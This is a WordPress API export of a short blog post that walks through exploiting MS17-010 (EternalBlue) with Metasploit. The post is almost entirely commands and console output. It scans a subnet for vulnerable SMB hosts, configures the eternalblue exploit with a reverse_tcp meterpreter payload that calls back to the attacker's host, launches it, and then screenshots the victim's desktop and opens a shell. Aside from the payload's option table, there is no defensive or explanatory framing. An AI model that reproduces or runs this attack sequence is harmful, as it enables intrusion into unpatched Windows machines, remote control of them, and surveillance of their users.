{"id":168,"date":"2019-01-25T19:48:15","date_gmt":"2019-01-25T11:48:15","guid":{"rendered":"http:\/\/h-k.pw\/?p=168"},"modified":"2019-01-25T19:48:16","modified_gmt":"2019-01-25T11:48:16","slug":"ms17010","status":"publish","type":"post","link":"https:\/\/harson.co\/index.php\/2019\/01\/25\/ms17010\/","title":{"rendered":"MS17010"},"content":{"rendered":"<h2>1. First, detect vulnerable hosts on the network segment<\/h2>\n<p>Open msf<\/p>\n<pre>msfconsole\n\nmsf &gt; use auxiliary\/scanner\/smb\/smb_ms17_010        \/\/load the scanner module\nmsf auxiliary(scanner\/smb\/smb_ms17_010) &gt; set RHOSTS 192.168.22.1\/24    \/\/set the network range to scan\nmsf auxiliary(scanner\/smb\/smb_ms17_010) &gt; run        \/\/run the scan<\/pre>\n<h2>2. Exploiting the vulnerability<\/h2>\n<pre>msf &gt; use exploit\/windows\/smb\/ms17_010_eternalblue          \/\/load the exploit module\nmsf exploit(windows\/smb\/ms17_010_eternalblue) &gt; set RHOST 192.168.22.25      \/\/set the target IP\nRHOSTS =&gt; 192.168.22.25\nmsf exploit(windows\/smb\/ms17_010_eternalblue) &gt; set LHOST 192.168.5.146        \/\/set the local IP\nLHOST =&gt; 192.168.5.146\nmsf exploit(windows\/smb\/ms17_010_eternalblue) &gt; set payload windows\/x64\/meterpreter\/reverse_tcp     \/\/set the reverse-connection payload\npayload =&gt; windows\/x64\/meterpreter\/reverse_tcp\nmsf exploit(windows\/smb\/ms17_010_eternalblue) &gt;<\/pre>\n<p>View the currently configured payload<\/p>\n<pre>msf exploit(windows\/smb\/ms17_010_eternalblue) &gt; show options    \/\/view the configuration options\n\nModule options (exploit\/windows\/smb\/ms17_010_eternalblue):\n\n   Name                Current Setting  Required  Description\n   ----                ---------------  --------  -----------\n   GroomAllocations    12               yes       Initial number of times to 
groom the kernel pool.\n   GroomDelta          5                yes       The amount to increase the groom count by per try.\n   MaxExploitAttempts  3                yes       The number of times to retry the exploit.\n   ProcessName         spoolsv.exe      yes       Process to inject payload into.\n   RHOST               192.168.22.25    yes       The target address\n   RPORT               445              yes       The target port (TCP)\n   SMBDomain           .                no        (Optional) The Windows domain to use for authentication\n   SMBPass                              no        (Optional) The password for the specified username\n   SMBUser                              no        (Optional) The username to authenticate as\n   VerifyArch          true             yes       Check if remote architecture matches exploit Target.\n   VerifyTarget        true             yes       Check if remote OS matches exploit Target.\n\n\nPayload options (windows\/x64\/meterpreter\/reverse_tcp):\n\n   Name      Current Setting  Required  Description\n   ----      ---------------  --------  -----------\n   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)\n   LHOST     192.168.5.146    yes       The listen address\n   LPORT     4444             yes       The listen port\n\n\nExploit target:\n\n   Id  Name\n   --  ----\n   0   Windows 7 and Server 2008 R2 (x64) All Service Packs\n\n\nmsf exploit(windows\/smb\/ms17_010_eternalblue) &gt;<\/pre>\n<h3>Launch the attack:<\/h3>\n<pre>Attack command: \nmsf exploit(windows\/smb\/ms17_010_eternalblue) &gt; exploit        \/\/launch the attack<\/pre>\n<h2>Capture the remote computer's desktop:<\/h2>\n<pre>meterpreter &gt; screenshot\nScreenshot saved to: \/root\/RBDEvfGv.jpeg    \/\/the remote computer's screenshot can be viewed in the \/root directory\nshell \/\/obtain a shell\nchcp 65001 
\/\/make cmd display Chinese text<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>1. First, detect vulnerable hosts on the network segment Open msf msfconsole msf &gt; use auxili [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[12],"tags":[],"class_list":["post-168","post","type-post","status-publish","format-standard","hentry","category-security"],"_links":{"self":[{"href":"https:\/\/harson.co\/index.php\/wp-json\/wp\/v2\/posts\/168","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/harson.co\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/harson.co\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/harson.co\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/harson.co\/index.php\/wp-json\/wp\/v2\/comments?post=168"}],"version-history":[{"count":3,"href":"https:\/\/harson.co\/index.php\/wp-json\/wp\/v2\/posts\/168\/revisions"}],"predecessor-version":[{"id":171,"href":"https:\/\/harson.co\/index.php\/wp-json\/wp\/v2\/posts\/168\/revisions\/171"}],"wp:attachment":[{"href":"https:\/\/harson.co\/index.php\/wp-json\/wp\/v2\/media?parent=168"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/harson.co\/index.php\/wp-json\/wp\/v2\/categories?post=168"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/harson.co\/index.php\/wp-json\/wp\/v2\/tags?post=168"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}